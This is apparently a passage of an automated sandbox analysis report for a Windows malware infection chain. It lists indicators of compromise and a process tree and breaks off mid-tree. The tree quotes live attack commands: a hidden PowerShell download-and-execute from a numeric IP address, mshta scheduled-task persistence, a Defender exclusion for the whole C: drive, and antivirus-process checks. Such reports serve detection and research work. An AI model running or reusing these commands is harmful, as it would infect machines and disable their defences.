3404	powershell.exe
3404	powershell.exe
10588	1ee0df37aa.exe
10588	1ee0df37aa.exe
12724	Exam.com
12724	Exam.com
12724	Exam.com
12724	Exam.com
12724	Exam.com
12724	Exam.com
10588	1ee0df37aa.exe
10588	1ee0df37aa.exe
10588	1ee0df37aa.exe
10588	1ee0df37aa.exe
7840	rapes.exe
7840	rapes.exe
7804	BIm18E9.exe
7804	BIm18E9.exe
7180	msiexec.exe
7180	msiexec.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
8964	powershell.exe
8964	powershell.exe
8964	powershell.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
8288	ScreenConnect.ClientService.exe
10776	TempHQT3IF496XBAPGQBGQUWEEN9WR6SUVON.EXE
10776	TempHQT3IF496XBAPGQBGQUWEEN9WR6SUVON.EXE
12724	Exam.com
12724	Exam.com
12724	Exam.com
12724	Exam.com
436	fontdrvhost.exe
436	fontdrvhost.exe
436	fontdrvhost.exe
436	fontdrvhost.exe
6776	BIm18E9.exe
6776	BIm18E9.exe
6892	powershell.exe
6892	powershell.exe
6892	powershell.exe
7196	powershell.exe
7196	powershell.exe
7196	powershell.exe
7552	powershell.exe
7552	powershell.exe
7552	powershell.exe
3604	powershell.exe
3604	powershell.exe
3604	powershell.exe
4728	483d2fa8a0d53818306efeb32d3.exe
4728	483d2fa8a0d53818306efeb32d3.exe
13044	Exam.com
13044	Exam.com

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
1380	46f39871.exe
656	Process not Found
656	Process not Found

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5196	f73ae_003.exe
5196	f73ae_003.exe
5196	f73ae_003.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5296	powershell.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeDebugPrivilege	10736	tasklist.exe
Token: SeDebugPrivilege	11428	tasklist.exe
Token: SeDebugPrivilege	10180	tool.exe
Token: SeShutdownPrivilege	7284	msiexec.exe
Token: SeIncreaseQuotaPrivilege	7284	msiexec.exe
Token: SeSecurityPrivilege	7180	msiexec.exe
Token: SeCreateTokenPrivilege	7284	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	7284	msiexec.exe
Token: SeLockMemoryPrivilege	7284	msiexec.exe
Token: SeIncreaseQuotaPrivilege	7284	msiexec.exe
Token: SeMachineAccountPrivilege	7284	msiexec.exe
Token: SeTcbPrivilege	7284	msiexec.exe
Token: SeSecurityPrivilege	7284	msiexec.exe
Token: SeTakeOwnershipPrivilege	7284	msiexec.exe
Token: SeLoadDriverPrivilege	7284	msiexec.exe
Token: SeSystemProfilePrivilege	7284	msiexec.exe
Token: SeSystemtimePrivilege	7284	msiexec.exe
Token: SeProfSingleProcessPrivilege	7284	msiexec.exe
Token: SeIncBasePriorityPrivilege	7284	msiexec.exe
Token: SeCreatePagefilePrivilege	7284	msiexec.exe
Token: SeCreatePermanentPrivilege	7284	msiexec.exe
Token: SeBackupPrivilege	7284	msiexec.exe
Token: SeRestorePrivilege	7284	msiexec.exe
Token: SeShutdownPrivilege	7284	msiexec.exe
Token: SeDebugPrivilege	7284	msiexec.exe
Token: SeAuditPrivilege	7284	msiexec.exe
Token: SeSystemEnvironmentPrivilege	7284	msiexec.exe
Token: SeChangeNotifyPrivilege	7284	msiexec.exe
Token: SeRemoteShutdownPrivilege	7284	msiexec.exe
Token: SeUndockPrivilege	7284	msiexec.exe
Token: SeSyncAgentPrivilege	7284	msiexec.exe
Token: SeEnableDelegationPrivilege	7284	msiexec.exe
Token: SeManageVolumePrivilege	7284	msiexec.exe
Token: SeImpersonatePrivilege	7284	msiexec.exe
Token: SeCreateGlobalPrivilege	7284	msiexec.exe
Token: SeCreateTokenPrivilege	7284	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	7284	msiexec.exe
Token: SeLockMemoryPrivilege	7284	msiexec.exe
Token: SeIncreaseQuotaPrivilege	7284	msiexec.exe
Token: SeMachineAccountPrivilege	7284	msiexec.exe
Token: SeTcbPrivilege	7284	msiexec.exe
Token: SeSecurityPrivilege	7284	msiexec.exe
Token: SeTakeOwnershipPrivilege	7284	msiexec.exe
Token: SeLoadDriverPrivilege	7284	msiexec.exe
Token: SeSystemProfilePrivilege	7284	msiexec.exe
Token: SeSystemtimePrivilege	7284	msiexec.exe
Token: SeProfSingleProcessPrivilege	7284	msiexec.exe
Token: SeIncBasePriorityPrivilege	7284	msiexec.exe
Token: SeCreatePagefilePrivilege	7284	msiexec.exe
Token: SeCreatePermanentPrivilege	7284	msiexec.exe
Token: SeBackupPrivilege	7284	msiexec.exe
Token: SeRestorePrivilege	7284	msiexec.exe
Token: SeShutdownPrivilege	7284	msiexec.exe
Token: SeDebugPrivilege	7284	msiexec.exe
Token: SeAuditPrivilege	7284	msiexec.exe
Token: SeSystemEnvironmentPrivilege	7284	msiexec.exe
Token: SeChangeNotifyPrivilege	7284	msiexec.exe
Token: SeRemoteShutdownPrivilege	7284	msiexec.exe
Token: SeUndockPrivilege	7284	msiexec.exe
Token: SeSyncAgentPrivilege	7284	msiexec.exe
Token: SeEnableDelegationPrivilege	7284	msiexec.exe
Token: SeManageVolumePrivilege	7284	msiexec.exe

Suspicious use of FindShellTrayWindow 23 IoCs

pid	Process
3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe
3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe
3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe
12724	Exam.com
12724	Exam.com
12724	Exam.com
7284	msiexec.exe
8552	3ba6653a6c.exe
8552	3ba6653a6c.exe
8552	3ba6653a6c.exe
7284	msiexec.exe
13044	Exam.com
13044	Exam.com
13044	Exam.com
13104	Passwords.com
13104	Passwords.com
13104	Passwords.com
6392	Exam.com
6392	Exam.com
6392	Exam.com
208	Exam.com
208	Exam.com
208	Exam.com

Suspicious use of SendNotifyMessage 21 IoCs

pid	Process
3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe
3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe
3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe
12724	Exam.com
12724	Exam.com
12724	Exam.com
8552	3ba6653a6c.exe
8552	3ba6653a6c.exe
8552	3ba6653a6c.exe
13044	Exam.com
13044	Exam.com
13044	Exam.com
13104	Passwords.com
13104	Passwords.com
13104	Passwords.com
6392	Exam.com
6392	Exam.com
6392	Exam.com
208	Exam.com
208	Exam.com
208	Exam.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3588 wrote to memory of 4072	3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe	86
PID 3588 wrote to memory of 4072	3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe	86
PID 3588 wrote to memory of 4072	3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe	86
PID 3588 wrote to memory of 5244	3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe	87
PID 3588 wrote to memory of 5244	3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe	87
PID 3588 wrote to memory of 5244	3588	f5b76ee2f82d8dcc2dd274f1db28f32d.exe	87
PID 4072 wrote to memory of 2088	4072	cmd.exe	89
PID 4072 wrote to memory of 2088	4072	cmd.exe	89
PID 4072 wrote to memory of 2088	4072	cmd.exe	89
PID 5244 wrote to memory of 5296	5244	mshta.exe	91
PID 5244 wrote to memory of 5296	5244	mshta.exe	91
PID 5244 wrote to memory of 5296	5244	mshta.exe	91
PID 5296 wrote to memory of 4392	5296	powershell.exe	97
PID 5296 wrote to memory of 4392	5296	powershell.exe	97
PID 5296 wrote to memory of 4392	5296	powershell.exe	97
PID 4392 wrote to memory of 1244	4392	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE	101
PID 4392 wrote to memory of 1244	4392	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE	101
PID 4392 wrote to memory of 1244	4392	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE	101
PID 1244 wrote to memory of 5196	1244	rapes.exe	106
PID 1244 wrote to memory of 5196	1244	rapes.exe	106
PID 1244 wrote to memory of 5196	1244	rapes.exe	106
PID 5196 wrote to memory of 1896	5196	f73ae_003.exe	107
PID 5196 wrote to memory of 1896	5196	f73ae_003.exe	107
PID 5196 wrote to memory of 2948	5196	f73ae_003.exe	109
PID 5196 wrote to memory of 2948	5196	f73ae_003.exe	109
PID 1896 wrote to memory of 3404	1896	cmd.exe	110
PID 1896 wrote to memory of 3404	1896	cmd.exe	110
PID 2948 wrote to memory of 864	2948	svchost.exe	114
PID 2948 wrote to memory of 864	2948	svchost.exe	114
PID 2948 wrote to memory of 5388	2948	svchost.exe	115
PID 2948 wrote to memory of 5388	2948	svchost.exe	115
PID 1244 wrote to memory of 2868	1244	rapes.exe	116
PID 1244 wrote to memory of 2868	1244	rapes.exe	116
PID 1244 wrote to memory of 2868	1244	rapes.exe	116
PID 2868 wrote to memory of 5324	2868	7IIl2eE.exe	118
PID 2868 wrote to memory of 5324	2868	7IIl2eE.exe	118
PID 2868 wrote to memory of 5324	2868	7IIl2eE.exe	118
PID 1244 wrote to memory of 1396	1244	rapes.exe	120
PID 1244 wrote to memory of 1396	1244	rapes.exe	120
PID 1244 wrote to memory of 1396	1244	rapes.exe	120
PID 1396 wrote to memory of 5032	1396	TbV75ZR.exe	123
PID 1396 wrote to memory of 5032	1396	TbV75ZR.exe	123
PID 1396 wrote to memory of 5032	1396	TbV75ZR.exe	123
PID 1244 wrote to memory of 10588	1244	rapes.exe	127
PID 1244 wrote to memory of 10588	1244	rapes.exe	127
PID 1244 wrote to memory of 10588	1244	rapes.exe	127
PID 5032 wrote to memory of 10736	5032	CMD.exe	128
PID 5032 wrote to memory of 10736	5032	CMD.exe	128
PID 5032 wrote to memory of 10736	5032	CMD.exe	128
PID 5032 wrote to memory of 10752	5032	CMD.exe	129
PID 5032 wrote to memory of 10752	5032	CMD.exe	129
PID 5032 wrote to memory of 10752	5032	CMD.exe	129
PID 5032 wrote to memory of 11428	5032	CMD.exe	130
PID 5032 wrote to memory of 11428	5032	CMD.exe	130
PID 5032 wrote to memory of 11428	5032	CMD.exe	130
PID 5032 wrote to memory of 11452	5032	CMD.exe	131
PID 5032 wrote to memory of 11452	5032	CMD.exe	131
PID 5032 wrote to memory of 11452	5032	CMD.exe	131
PID 5032 wrote to memory of 11628	5032	CMD.exe	132
PID 5032 wrote to memory of 11628	5032	CMD.exe	132
PID 5032 wrote to memory of 11628	5032	CMD.exe	132
PID 5032 wrote to memory of 11672	5032	CMD.exe	133
PID 5032 wrote to memory of 11672	5032	CMD.exe	133
PID 5032 wrote to memory of 11672	5032	CMD.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2840
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:436
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6536
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  PID:9912
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  PID:10112

C:\Users\Admin\AppData\Local\Temp\f5b76ee2f82d8dcc2dd274f1db28f32d.exe
"C:\Users\Admin\AppData\Local\Temp\f5b76ee2f82d8dcc2dd274f1db28f32d.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn qglOemaYSdD /tr "mshta C:\Users\Admin\AppData\Local\Temp\moPjuBpmF.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn qglOemaYSdD /tr "mshta C:\Users\Admin\AppData\Local\Temp\moPjuBpmF.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2088
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\moPjuBpmF.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5244
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5296
  - - C:\Users\Admin\AppData\Local\Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE
      "C:\Users\Admin\AppData\Local\Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4392
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1244
      - C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:5196
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3404
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:2948
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:864
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\{5fb42a70-d5f8-434c-a0a2-5af2a90802b8}\14652926.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{5fb42a70-d5f8-434c-a0a2-5af2a90802b8}\14652926.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:10760
        
        C:\Users\Admin\AppData\Local\Temp\{cbb72c3b-f52f-40ec-9054-af100ab319d3}\46f39871.exe
        
        C:/Users/Admin/AppData/Local/Temp/{cbb72c3b-f52f-40ec-9054-af100ab319d3}/\46f39871.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        
        PID:1380
      - C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2868
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        
        PID:5324
      - C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1396
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5032
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:10736
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        
        PID:10752
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:11428
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:11452
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:11628
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:11672
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "East" Removed
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4628
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        8⤵
        
        PID:752
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:12724
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 12724 -s 928
        9⤵
        Program crash
        
        PID:2224
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        
        PID:12860
      - C:\Users\Admin\AppData\Local\Temp\10340260101\1ee0df37aa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340260101\1ee0df37aa.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:10588
      - C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:10180
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
        7⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:7284
      - C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:6156
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4440
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:8992
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        
        PID:9008
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:9764
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:9820
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        8⤵
        
        PID:12080
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:11708
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "East" Removed
        8⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5256
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10064
        
        C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:13044
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 13044 -s 912
        9⤵
        Program crash
        
        PID:6664
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10132
      - C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:7804
      - C:\Users\Admin\AppData\Local\Temp\10341150101\3ba6653a6c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341150101\3ba6653a6c.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:8552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn iPHiZma6kHO /tr "mshta C:\Users\Admin\AppData\Local\Temp\GZ0rlEtDZ.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        
        PID:8604
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn iPHiZma6kHO /tr "mshta C:\Users\Admin\AppData\Local\Temp\GZ0rlEtDZ.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:9156
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\GZ0rlEtDZ.hta
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:8612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HQT3IF496XBAPGQBGQUWEEN9WR6SUVON.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Suspicious behavior: EnumeratesProcesses
        
        PID:8964
        
        C:\Users\Admin\AppData\Local\TempHQT3IF496XBAPGQBGQUWEEN9WR6SUVON.EXE
        
        "C:\Users\Admin\AppData\Local\TempHQT3IF496XBAPGQBGQUWEEN9WR6SUVON.EXE"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:10776
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10341160121\am_no.cmd" "
        6⤵
        
        PID:10652
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:11304
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        
        PID:6808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:7196
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        
        PID:7492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:7552
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "5VmQNmafbAD" /tr "mshta \"C:\Temp\zCx8rUuP1.hta\"" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:7952
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\zCx8rUuP1.hta"
        7⤵
        Checks computer location settings
        
        PID:8040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
